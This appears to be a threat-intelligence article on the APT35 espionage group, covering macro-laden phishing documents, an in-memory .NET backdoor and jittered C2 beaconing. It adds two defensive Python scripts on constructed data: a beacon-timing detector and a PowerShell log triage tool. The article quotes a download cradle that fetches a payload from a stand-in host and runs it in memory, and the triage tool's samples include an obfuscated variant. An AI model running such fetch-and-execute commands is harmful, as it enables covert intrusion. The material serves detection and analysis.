Since emerging in the mid-2010s as a persistent threat actor, the IRGC-linked APT35 collective has continually adapted its tactics to target government entities, energy firms, and diplomatic missions across the Middle East and beyond.
Initially focused on credential harvesting via targeted phishing campaigns, the group has evolved a modular toolkit capable of deep network infiltration and long-term espionage.
Its operations begin with carefully crafted spear-phishing messages whose attached Office documents abuse legacy VBA macros (a feature the recipient must enable, not a software vulnerability), setting the stage for stealthy deployment of backdoors.
Cloudsek analysts noted that APT35’s toolset includes both custom and publicly available components, allowing researchers to trace distinct code fingerprints even as the adversary pivots between payloads.
Cloudsek researchers also identified a correlation between the group’s use of .NET-based implants and a pronounced shift toward in-memory execution, which reduces disk artifacts and complicates forensic analysis.
This discovery has driven the development of tailored detection rules for network defenders.
The campaign’s impact has been significant: compromised networks have suffered data exfiltration of diplomatic communications, intellectual property theft, and strategic reconnaissance tailored to state-level objectives.
APT35’s operational security measures—including randomized C2 beaconing intervals and encrypted channels over HTTP/HTTPS—have consistently evaded traditional signature-based defenses. Victims often remain unaware of compromise for months, allowing deep data collection and lateral propagation.
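Randomising the sleep between beacons defeats a rule that looks for one fixed interval, but it does not remove the regularity itself: a jittered timer still produces inter-arrival gaps that cluster tightly around a mean, which human browsing never does. The following script is an added example (not code from the article or from Cloudsek) that runs that test over a constructed proxy log. The timestamps, IP addresses and host names are invented for illustration and are not indicators from the report; the 0.35 coefficient-of-variation threshold and the six-event minimum are assumptions a defender would tune against their own traffic.

```python
"""Beacon-interval analysis over a constructed proxy log (added example).

Hypothetical data: the IPs, host names and timestamps below are made up
for illustration and are not indicators from the Cloudsek report.
"""
import re
import statistics
from datetime import datetime

# Constructed sample proxy log: "<UTC timestamp> <src_ip> <dst_host> <dst_port> <bytes>".
#   10.20.30.40 -> updates.example-cdn.net : jittered beacon, 45-75 s apart
#   10.20.30.41 -> intranet.example.org    : bursty human browsing
#   10.20.30.42 -> time.example.net        : periodic but too few events to judge
SAMPLE_LOG = """\
2024-03-04T09:00:00Z 10.20.30.40 updates.example-cdn.net 443 1187
2024-03-04T09:00:03Z 10.20.30.41 intranet.example.org 443 48211
2024-03-04T09:00:05Z 10.20.30.41 intranet.example.org 443 9320
2024-03-04T09:00:06Z 10.20.30.41 intranet.example.org 443 2204
2024-03-04T09:00:58Z 10.20.30.40 updates.example-cdn.net 443 1190
2024-03-04T09:02:09Z 10.20.30.40 updates.example-cdn.net 443 1185
2024-03-04T09:02:58Z 10.20.30.40 updates.example-cdn.net 443 1188
2024-03-04T09:03:40Z 10.20.30.41 intranet.example.org 443 77102
2024-03-04T09:03:41Z 10.20.30.41 intranet.example.org 443 5123
2024-03-04T09:03:47Z 10.20.30.41 intranet.example.org 443 31000
2024-03-04T09:04:01Z 10.20.30.40 updates.example-cdn.net 443 1191
2024-03-04T09:04:56Z 10.20.30.40 updates.example-cdn.net 443 1186
2024-03-04T09:05:00Z 10.20.30.42 time.example.net 443 512
2024-03-04T09:06:00Z 10.20.30.42 time.example.net 443 512
2024-03-04T09:06:04Z 10.20.30.40 updates.example-cdn.net 443 1189
2024-03-04T09:06:56Z 10.20.30.40 updates.example-cdn.net 443 1187
2024-03-04T09:07:00Z 10.20.30.42 time.example.net 443 512
2024-03-04T09:07:56Z 10.20.30.40 updates.example-cdn.net 443 1190
2024-03-04T09:09:10Z 10.20.30.40 updates.example-cdn.net 443 1188
2024-03-04T09:09:57Z 10.20.30.40 updates.example-cdn.net 443 1186
2024-03-04T09:11:03Z 10.20.30.40 updates.example-cdn.net 443 1191
2024-03-04T09:11:20Z 10.20.30.41 intranet.example.org 443 60433
2024-03-04T09:11:21Z 10.20.30.41 intranet.example.org 443 4410
2024-03-04T09:12:02Z 10.20.30.40 updates.example-cdn.net 443 1189
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (\d+)$")


def parse_log(text):
    """Yield (timestamp, src, dst) for each well-formed line; skip anything else."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m.group(2), m.group(3)


def interval_stats(text):
    """Per (src, dst) flow: event count, mean gap, and coefficient of variation of the gaps."""
    flows = {}
    for ts, src, dst in parse_log(text):
        flows.setdefault((src, dst), []).append(ts)
    stats = {}
    for key, times in flows.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(gaps) < 2:  # stdev needs at least two gaps
            stats[key] = {"events": len(times), "mean_gap": None, "cv": None}
            continue
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean > 0 else float("inf")
        stats[key] = {"events": len(times), "mean_gap": mean, "cv": cv}
    return stats


def find_beacons(text, min_events=6, max_cv=0.35):
    """Flag flows that are frequent enough to judge and too regular to be human.

    Uniform jitter of +/-25% around a base interval gives a CV near 0.14, far
    below max_cv, so randomising the sleep does not hide the beacon from this test.
    Thresholds are assumptions to be tuned per environment.
    """
    return {
        key: s for key, s in interval_stats(text).items()
        if s["events"] >= min_events and s["cv"] is not None and s["cv"] <= max_cv
    }


if __name__ == "__main__":
    for (src, dst), s in find_beacons(SAMPLE_LOG).items():
        print(f"beacon candidate {src} -> {dst}: {s['events']} events, "
              f"mean gap {s['mean_gap']:.1f}s, cv {s['cv']:.2f}")
```

Only the jittered flow survives both filters: the browsing flow has a CV above 1, and the three-event flow is perfectly periodic but is rejected for lack of evidence, which matters because many legitimate agents poll on a timer and a handful of events says nothing. Because the test uses timing only, it works unchanged against HTTPS where the payload is opaque.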
The group’s espionage operations extend beyond technical tradecraft. APT35 operators conduct extensive open-source intelligence (OSINT) gathering to craft highly convincing lures, leveraging geopolitical events and professional contacts in targeted organizations.
This human-centric approach, combined with advanced malware, underscores the adversary’s adaptability and resource investment.
Infection Mechanism Deep Dive
APT35’s primary infection vector leverages weaponized Word documents containing obfuscated VBA macros designed to load a staged downloader into memory.
When the document is opened, the macro launches a PowerShell download cradle, which the attackers dress up as legitimate Windows Update activity:
# Stage-one download cradle as quoted in the report (defanged URL)
$u = "http://malicious[.]domain/payload.bin"
# -UseBasicParsing skips the Internet Explorer DOM parser, so the fetch works on hardened or headless hosts
$r = Invoke-WebRequest -Uri $u -UseBasicParsing
# The response bytes are decoded as UTF-8 text...
$e = [System.Text.Encoding]::UTF8.GetString($r.Content)
# ...and executed directly in memory; nothing is written to disk
Invoke-Expression $e
The downloaded stage then decrypts the next-stage DLL with an AES key embedded in the VBA code. The decrypted payload, typically a .NET-compiled backdoor known as PhosphorusLoader, registers itself as a COM object for persistence, uses process hollowing to inject into svchost.exe, and beacons intermittently to a hidden C2 domain. Figure 1 illustrates this injection workflow; the AES key is stored in an encrypted resource section for evasion.
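The cradle above leaves no file on disk, but PowerShell script block logging (Event ID 4104) records the text of every block it compiles, and the combination that defines a cradle is stable even when the attacker renames variables or hides cmdlet names: something that fetches bytes off the network plus something that executes a string. The script below is an added example (not code from the article or from Cloudsek) that triages logged script block text on that basis. It normalises two cheap obfuscations, backtick escapes inside barewords and adjacent string literals joined with "+", before matching. The `curl`/`wget` entries rely on the Windows PowerShell 5.1 aliases for Invoke-WebRequest; the sample blocks other than the article's own cradle are constructed, and their IP addresses and host names are placeholders.

```python
"""Triage of PowerShell script block text (Event ID 4104) for download cradles.

Added example, not code from the article or from Cloudsek. The script blocks
below are constructed; IP addresses and host names in them are placeholders.
"""
import re

# Fetch primitives: anything that pulls bytes off the network into the session.
# curl/wget are Windows PowerShell 5.1 aliases for Invoke-WebRequest.
FETCH_PATTERNS = [
    r"\binvoke-webrequest\b", r"\biwr\b", r"\bcurl\b", r"\bwget\b",
    r"\binvoke-restmethod\b", r"\birm\b",
    r"net\.webclient", r"\.downloadstring\(", r"\.downloaddata\(", r"\.downloadfile\(",
    r"\bstart-bitstransfer\b",
]
# Exec primitives: anything that turns a string into running code.
EXEC_PATTERNS = [
    r"\binvoke-expression\b", r"\biex\b", r"\[scriptblock\]::create\(",
]

# Constructed sample script blocks, keyed by an arbitrary id.
SAMPLE_BLOCKS = {
    # The cradle quoted in the article, as script block logging would record it.
    "article-cradle": '''$u = "http://malicious[.]domain/payload.bin"
$r = Invoke-WebRequest -Uri $u -UseBasicParsing
$e = [System.Text.Encoding]::UTF8.GetString($r.Content)
Invoke-Expression $e''',
    # Constructed variant using backtick and string-concatenation obfuscation.
    "obfuscated-cradle": '''$w = New-Object ('Net.'+'WebClient')
I`E`X $w.DownloadString('http://198.51.100.7/s')''',
    # Constructed benign admin script: fetches a file to disk, never executes a string.
    "installer-fetch": '''Invoke-WebRequest -Uri https://downloads.example.com/agent.msi -OutFile C:\\Temp\\agent.msi
Start-Process msiexec.exe -ArgumentList '/i C:\\Temp\\agent.msi /qn' -Wait''',
    # Constructed benign script with no network activity at all.
    "inventory": '''Get-ChildItem C:\\Windows\\System32 -Filter *.dll | Measure-Object''',
}


def normalize(script):
    """Undo cheap obfuscation so the patterns above can match.

    - backtick escapes inside barewords (i`e`x -> iex) are dropped
    - adjacent string literals joined with '+' ('Invoke-'+'Expression') are fused
    - case and runs of whitespace are folded
    """
    s = script.replace("`", "")
    s = re.sub(r"""['"]\s*\+\s*['"]""", "", s)
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def classify(script):
    """Return (verdict, fetch_hits, exec_hits) for one script block."""
    s = normalize(script)
    fetch = [p for p in FETCH_PATTERNS if re.search(p, s)]
    exec_ = [p for p in EXEC_PATTERNS if re.search(p, s)]
    if fetch and exec_:
        verdict = "download-cradle"   # fetch + execute-string: the cradle shape
    elif fetch:
        verdict = "fetch-only"        # worth a look, but installers do this too
    else:
        verdict = "clean"
    return verdict, fetch, exec_


def triage(blocks):
    """Map block id -> verdict for a batch of logged script blocks."""
    return {name: classify(text)[0] for name, text in blocks.items()}


if __name__ == "__main__":
    for name, text in SAMPLE_BLOCKS.items():
        verdict, fetch, exec_ = classify(text)
        print(f"{name:20s} {verdict:16s} fetch={len(fetch)} exec={len(exec_)}")
```

Requiring both halves is what keeps the benign installer out of the alert queue: it fetches with the same cmdlet the cradle uses but writes to disk and never evaluates a string. Normalisation is a triage aid, not a decoder; heavier obfuscation (format strings, encoded commands) will not be matched here, though script block logging records the dynamically built blocks that such code eventually compiles, so the cleartext cradle tends to surface in a later 4104 event.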